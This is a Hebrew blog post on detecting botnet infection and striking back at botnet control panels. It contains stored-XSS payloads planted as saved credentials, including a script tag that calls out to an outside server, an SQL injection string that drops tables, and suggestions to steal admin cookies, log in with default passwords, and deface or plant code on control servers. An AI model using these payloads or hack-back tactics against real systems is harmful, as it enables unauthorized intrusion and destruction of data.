<div id="attachment_711" style="width: 810px" class="wp-caption aligncenter"><a href="http://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-panel-passwords.png"><img aria-describedby="caption-attachment-711" loading="lazy" class="size-full wp-image-711" alt="פאנל ניהול של בוטנט" src="http://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-panel-passwords.png" width="800" height="600" srcset="https://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-panel-passwords.png 800w, https://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-panel-passwords-300x225.png 300w" sizes="(max-width: 800px) 100vw, 800px" /></a><p id="caption-attachment-711" class="wp-caption-text">פאנל ניהול של מערכת לגניבת סיסמאות</p></div>
<p>מכירים XSS? מגניב! אז למה לא להשתמש בווקטור התקיפה הנהדר הזה כדי ששרת הבוטנט ידווח לנו האם במחשב הודבק? המטרה היא לשנות אחד מנתונים הנאספים ע&quot;י הבוט לקוד שירוץ בעת ההתחברות של מנהל הבוטנט לפאנל ניהול. במילים פשוטות – Stored XSS.</p>
<p>אז על מה בעצם מדובר? ישנם סוגי בוטנטים שנועדו לגנוב סיסמאות שמורות במחשב באפליקציות שונות. לדוגמה בדפדפן, לקוח FTP וכדומה. מה אם נשתול קוד &quot;זדוני&quot; משלנו באחת האפליקציות הנ&quot;ל במקום שם משתמש או הסיסמה? כך שאם הבוטנט אינו מבצע סינון קלט ופלט למידע הנאסף, נוכל לגרום לקוד זה לרוץ על שרת ה- C&amp;C ולדווח לנו.</p>
<p>S'il vous plaît!</p>
<p>לצורך הדגמה, שמרתי ב- Firefox פרטי הזדהות, כאשר שם המשתמש הינו ה- Hello World של עולם ה- XSS:</p>
<pre dir="ltr">admin&lt;script&gt;alert(1)&lt;/script&gt;</pre>
<p>לאחר מכן הדבקתי אחת המכונות במעבדה בסוס טרויאני של בוטנט בשם ISR ונכנסתי לפאנל ניהול שלו.</p>
<div id="attachment_713" style="width: 810px" class="wp-caption aligncenter"><a href="http://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-panel-xss-code.png"><img aria-describedby="caption-attachment-713" loading="lazy" class="size-full wp-image-713" alt="הזקרת קוד לפאנל ניהול של הבוטנט" src="http://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-panel-xss-code.png" width="800" height="600" srcset="https://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-panel-xss-code.png 800w, https://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-panel-xss-code-300x225.png 300w" sizes="(max-width: 800px) 100vw, 800px" /></a><p id="caption-attachment-713" class="wp-caption-text">מה?! שם המשתמש שלי הוא באמת admin&lt;script&gt;alert(1)&lt;/script&gt;</p></div>
<div id="attachment_712" style="width: 810px" class="wp-caption aligncenter"><a href="http://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-panel-xss.png"><img aria-describedby="caption-attachment-712" loading="lazy" class="size-full wp-image-712" alt="פריצת פאנל ניהול" src="http://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-panel-xss.png" width="800" height="599" srcset="https://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-panel-xss.png 800w, https://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-panel-xss-300x224.png 300w" sizes="(max-width: 800px) 100vw, 800px" /></a><p id="caption-attachment-712" class="wp-caption-text">Voilà</p></div>
<p>&nbsp;</p>
<p>אבל אנחנו לא באמת רוצים שיגלו אותנו. לכן, נקים שרת שיאזין לבקשות HTTP ונשנה את הקוד של alert למשהו יותר הגיוני שיתחבר לשרת שלנו, וכך נקבל התרעה חד משמעית שנדבקנו. לדוגמה:</p>
<pre dir="ltr">&lt;script src="http://www.saltedhash.co.il/trap.php"&gt;&lt;/script&gt;</pre>
<p>כמו עכביש שיושב באמצע הקורים, נפעיל האזנה על קובץ הלוג בשרת ונמתין לחיבור. במקרה שלי מדובר על Apache. אין צורך באמת להקים אתר עם קבצים – מספיק לראות שהייתה בקשת התחברות כולשהי.</p>
<div id="attachment_716" style="width: 730px" class="wp-caption aligncenter"><a href="http://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-trap.png"><img aria-describedby="caption-attachment-716" loading="lazy" class="size-full wp-image-716" alt="מלכודת לבוטנט" src="http://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-trap.png" width="720" height="400" srcset="https://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-trap.png 720w, https://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-trap-300x166.png 300w" sizes="(max-width: 720px) 100vw, 720px" /></a><p id="caption-attachment-716" class="wp-caption-text">חושי העכביש אומרים לי שנדבקתי</p></div>
<p>מפה ניתן להבין שמישבו פתח פאנל ניהול של הבוטנט בכתובת 10.0.1.2 ואז רץ הסקריפט ששתלתי במאגר סיסמאות של Firefox.</p>
<p>אז איפה עוד אפשר לשתול קוד? יש בוטנטים שסורקים את הקבצים במטרה למצוא מידע רגיש, יש הגונבים פרטי הזדהות כאשר מנסים להתחבר לאתר הבנק, ויש כאלה שאוספים מידע בסיסי ואחרי זה רק ממתינים לפקודות. כדי להיות בטוח צריך לשתול את הקוד שלנו בהרבה מאוד מקומות, ובחלקן זה בלתי אפשרי עקב מגבלות של Windows (לדוגמה בשם מחשב ושמות הקבצים). אפשר ליצור כמה קבצים בשם passwords.txt שיכילו את הקוד, לשתול את השם משתמש והסיסמה בכמה שיותר אפליקציות ששומרות פרטי הזדהות, לנסות להזדהות באתרי בנקים שונים עם קוד זדוני במקום שם משתמש (תזהרו עם זה). תחשבו על עוד רעיונות מקוריים. כמו כן, כדאי להשתמש במספר שיטות קידוד שונות לשמירת קוד XSS. בקיצור, בדיוק כמו עם חיפוש XSS בכול אתר אחר.</p>
<p>אך שיטה זו אינה מספיקה ואף דורשת השקעת זמן וכוח. לא כול פאנל ניהול פגיע ל- XSS; לא כול פאנל ניהול הוא אתר – יש כאלה שהם אפליקציה על מחשב (למרות שגם במקרה זה אפשר לחשוב על קלט זדוני, אך זה יהיה יותר קשה); בסופו של דבר, לא כול בוטנט בכלל אוסף מידע – יש כאלה שרק ממתינים לפקודות של ה- bot master לביצוע פעולה מסוימת, כמו תקיפת DoS.</p>
<p>אל דאגה, חשבתי על עוד דרך גילוי פשוטה יחסית!</p>
<h3>2. ניטור תעבורת הרשת</h3>
<p>דבר מעניין שגיליתי במהלך המחקר הקטן שלי – השיטה המקובלת לתקשורת של הבוט עם שרת השליטה והניהול היא באמצעות HTTP, כאשר רק תוכן ההודעה מוצפן. המפתח הוא סימטרי והוטמע בסוס הטרויאני (בוט) בעת יצירתו. כך זה נראה בפועל:</p>
<div id="attachment_717" style="width: 456px" class="wp-caption aligncenter"><a href="http://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-traffic.png"><img aria-describedby="caption-attachment-717" loading="lazy" class="size-full wp-image-717" alt="תעבורה של סוס טרויאני" src="http://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-traffic.png" width="446" height="414" srcset="https://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-traffic.png 446w, https://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-traffic-300x278.png 300w" sizes="(max-width: 446px) 100vw, 446px" /></a><p id="caption-attachment-717" class="wp-caption-text">fHGASMMz yourself!</p></div>
<p>התוכן לא באמת מעניין אותנו, אלא העובדה שהסוס הטרויאני בדרך כלל מדווח לשרת השליטה פעם בכמה זמן את הסטטוס שלו. סוג של משואה. לכן, מה שאפשר לעשות זה לכבות כל תוכנה אפשרית במחשב שידועה כמשתמש בתקשורת ולראות האם עדיין יש תעבורה. ברור שאי אפשר לסגור את הכול, הרי גם מערכת ההפעלה עצמה מתקשרת עם שרתים של מייקרוסופט. אבל אפשר לסנן עוד ועוד שירותים ידועים עד שנגיע למינימום תעבורה כך שיהיה קל למיין אותה. עכשיו נוכל בקלות לסרוק תעבורה לא מוכרת ולבדוק האם זו פעילות זדונית, או פשוט משהו שפיספסנו.</p>
<p>את ניתוח התעבורה אני ממליץ לעשות עם שני כלים – Wireshark שבעל יכולת סינון מתקדמת, אך אינו מודע לתהליך שיוצר את התעבורה, והכלי של SysInternals בשם Process Monitor שיכול לסנן לפי תהליך. מידע על כלים אלו וקישורים להורדה ניתן למצוא בעמוד <a title="כלי אבטחת מידע" href="http://www.saltedhash.co.il/tools/">רשימת כלי אבטחת מידע</a>.</p>
<p>&nbsp;</p>
<div id="attachment_718" style="width: 608px" class="wp-caption aligncenter"><a href="http://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-procmon-traffic.png"><img aria-describedby="caption-attachment-718" loading="lazy" class="size-full wp-image-718" alt="הקלטת תעבורה של סוס טרויאני" src="http://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-procmon-traffic.png" width="598" height="428" srcset="https://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-procmon-traffic.png 598w, https://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-procmon-traffic-300x214.png 300w" sizes="(max-width: 598px) 100vw, 598px" /></a><p id="caption-attachment-718" class="wp-caption-text">מזל שאני לא על מודם סלולרי</p></div>
<div id="attachment_719" style="width: 607px" class="wp-caption aligncenter"><a href="http://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-wireshark-traffic.png"><img aria-describedby="caption-attachment-719" loading="lazy" class="size-full wp-image-719" alt="הקלטת תעבורה של בוטנט" src="http://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-wireshark-traffic.png" width="597" height="427" srcset="https://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-wireshark-traffic.png 597w, https://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-wireshark-traffic-300x214.png 300w" sizes="(max-width: 597px) 100vw, 597px" /></a><p id="caption-attachment-719" class="wp-caption-text">לא זוכר שהתחברתי לאתר 10.0.1.1 מתישהו</p></div>
<p>בצילום של Wireshark אפשר לראות סיסמא שלי שנשלחת בצורה גלויה לאתר כולשהו שלא נכנסתי אליו בדפדפן. ובצילום של Process Monitor רואים שאיזשהו תהליך מדווח כל דקה בדיוק לשרת מוזר.</p>
<p>עכשיו אפשר לחסום את הכתובת של שרת השליטה (C&amp;C) ב- Firewall ולמנוע דלף מידע נוסף.</p>
<h2>מניעת הדבקות</h2>
<p>עכשיו שגילינו ששויכנו לבוטנט כזה או אחר, או אפילו כמה, ופירמטנו את המחשב (It's the only way to be sure. © Ripley), איך נמנע הדבקות חוזרת? בפסקה הראשונה כתבתי שלרוב אנטיוירוס לא יצליח לזהות סוס טרויאני מתקדם (בין אם הוא פולימורפי או משתמש ב- 0day).</p>
<p>פה באה לידי ביטוי עוד תכונה מעניינת שגיליתי. הרבה בוטנטים (והמתקדמים שביניהם בעיקר) בודקים עמידה של המחשב בקריטריונים מסוימים לפני שמדביקים אותו. <a title="האנטומיה של בוט, פרק 1: איך זה עובד" href="http://www.saltedhash.co.il/blog/what-is-botnet/">בפרק הראשון</a> סיפרתי שאחת השיטות של יוצרי הבוטנט למנוע רדיפה של נציגי השלטון היא לבדוק האם המחשב נמצא במדינה שבה גם הם נמצאים. במידה וכן, הבוט לא מותקן והסוס הטרויאני משמיד את עצמו. ולכן אפשר לשנות את המיקום בהגדרות לאוקראינה, לדוגמה, וכך להיות &quot;אחד מהחברה'&quot;.</p>
<p>אז המדינה זה לא הדבר היחיד שנבדק. מסתבר שחלקם בודקים גם הימצאות של תוכנות מסוימות, תוכנות המעידות שהמשחב שייך לאדם עם רקע בתקשורת ורברסינג. למה? כדי לצמצם עוד יותר את הסיכוי לחשיפה בפני אנשי החוק או מעבדות המחקר של חברות האנטיוירוס.</p>
<p>אילו תוכנות נבדקות? לרוב זה IDA ו- Wireshark. אז אפילו אם אתם לא עוסקים בתקשורת או רברסינג, כדאי להתקין תוכנות אלו (או ליצור את התיקיות והרשומות ב- registry) כדי לצמצם את סיכויי ההדבקות.</p>
<h2>a la guerre comme a la guerre</h2>
<p>במלחמה כמו במלחמה. למה לא לשבש לחלאות את כל המיזם? אלו רק מחשבות מה אפשר לעשות ובכלל פרי דמיון פרוע ואינו מומלץ לביצוע בבית ללא התייעצות קודמת עם עורך דין.</p>
<h3>1. השטלתות על פאנל ניהול</h3>
<p>אם גילינו את כתובת שרת השליטה באמצעות תקיפת XSS, למה לא להתחבר אליו? הרי בדרך כלל שרת השליטה והפאנל ניהול הם אותו אתר. אפשר לנסות פרטי הזדהות admin // admin ויש לזה סיכוי להצליח אם מדובר על ילדים שלא יודעים מה הם עושים. דרך יותר בטוחה, וצריך לחשוב עליה מראש, זה ליצור קוד XSS שלא רק ידווח לנו שהודבקנו ומה כתובת שרת השליטה, אלא גם תשלח לנו את ה- cookie של מי שהתחבר לשרת. ובמקרה שמשעמם לכם, אפשר לחפש את הקוד של פאנל ניהול ברשת ולנסות למצוא חולשות בבדיקת פרטי הזדהות.</p>
<p>מה לעשות אחרי שנכנסנו? קודם כול למחוק את עצמינו משם. האם תרצו גם למחוק את כל השאר, להשאיר מסר מלוכלך או לשטול קוד זדוני משלכם שידווח לכם מי ומתי נכנס לשם? להחלטתכם, אבל עדיף לעבוד דרך proxy.</p>
<h3>2. SQL Injection</h3>
<p>זוכרים את השם משתמש שלי? כן, זה:</p>
<pre dir="ltr">admin&lt;script&gt;alert(1)&lt;/script&gt;</pre>
<p>אז יש לי עוד אחד:</p>
<pre dir="ltr">admin'; DROP ALL TABLES;--</pre>
<p>מה, אחלה שם משתמש! והשאר אני משאיר לדמיון שליכם.</p>
<h2>לסיכום</h2>
<p>ישנו אינספור בוטנטים קיימים באינטרנט, רובם מוסתרים היטב ומחזיקים עשרות אלפי בוטים פעילים. אך עם קצת ידע בחיפוש מתקדם בגוגל ניתן למצוא מאות פאנלי ניהול חשופים לעולם כולו. חלקם נטושים, חלקם פעילים.</p>
<p>הנה דוגמה לבוטנט שמצאתי לאחר חיפוש של כמה דקות עם הזדהות באמצעות שם משתמש ברירת מחדל. שימו לב להשקעה בממשק משתמש שמזכיר שולחן עבודה!</p>
<div id="attachment_720" style="width: 815px" class="wp-caption aligncenter"><a href="http://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-panel-live.png"><img aria-describedby="caption-attachment-720" loading="lazy" class="size-full wp-image-720" alt="פאנל ניהול של בוטנט" src="http://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-panel-live.png" width="805" height="593" srcset="https://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-panel-live.png 805w, https://www.saltedhash.co.il/wp-content/uploads/2013/05/botnet-panel-live-300x220.png 300w" sizes="(max-width: 805px) 100vw, 805px" /></a><p id="caption-attachment-720" class="wp-caption-text">אפילו יש בוט אחד מישראל</p></div>
<p>ניסיתי להציג בפוסט זה דרך חשיבה לא סטנדרטית להתמודדות עם האיום. לא בהכרך זה יהיה שימושי בצורתו הנוכחית למשתמש הביתי. המסר הוא פשוט – שיטות ההגנה תמיד יהיו צעד אחד מאחור, אך חשוב לא להישאר שני צעדים אחורה.</p>
<p>נ.ב. למי שהתעניין בנושא, הנה מקור נחמד לסקירת בוטנטים חדשים שיוצאים: <a title="malware.dontneedcoffee.com" href="http://malware.dontneedcoffee.com" target="_blank">http://malware.dontneedcoffee.com</a>.</p>
<p>נ.נ.ב. גם בישראל עסק הסוסים הטרויאנים לא זר. בפודקאסט &quot;עושים היסטוריה&quot;, מספר רן לוי על <a href="http://www.ranlevi.com/2013/05/24/ep128_trjoanhorse/" target="_blank">פרשת הסוס הטרויאני בישראל</a> שהובילה לתגלית על מעורבות של הרבה חברות ענק בריגול עסקי לא חוקי. רן נשמע קצת מופתע מכך&#8230; אני דווקא הייתי מופתע אם זה היה אחרת. הפרק בכלל לא עמוס טכנית, אבל יכול לפקוח עיניים למי שחושב שבארץ זה לא קורה.</p><p>The post <a href="https://www.saltedhash.co.il/blog/detecting-botnet/">האנטומיה של בוט, פרק 2: ההגנה הכי טובה היא התקפה</a> first appeared on <a href="https://www.saltedhash.co.il">גיבוב ממולח</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://www.saltedhash.co.il/blog/detecting-botnet/feed/</wfw:commentRss>
			<slash:comments>2</slash:comments>
		
		
			</item>
	</channel>
</rss>
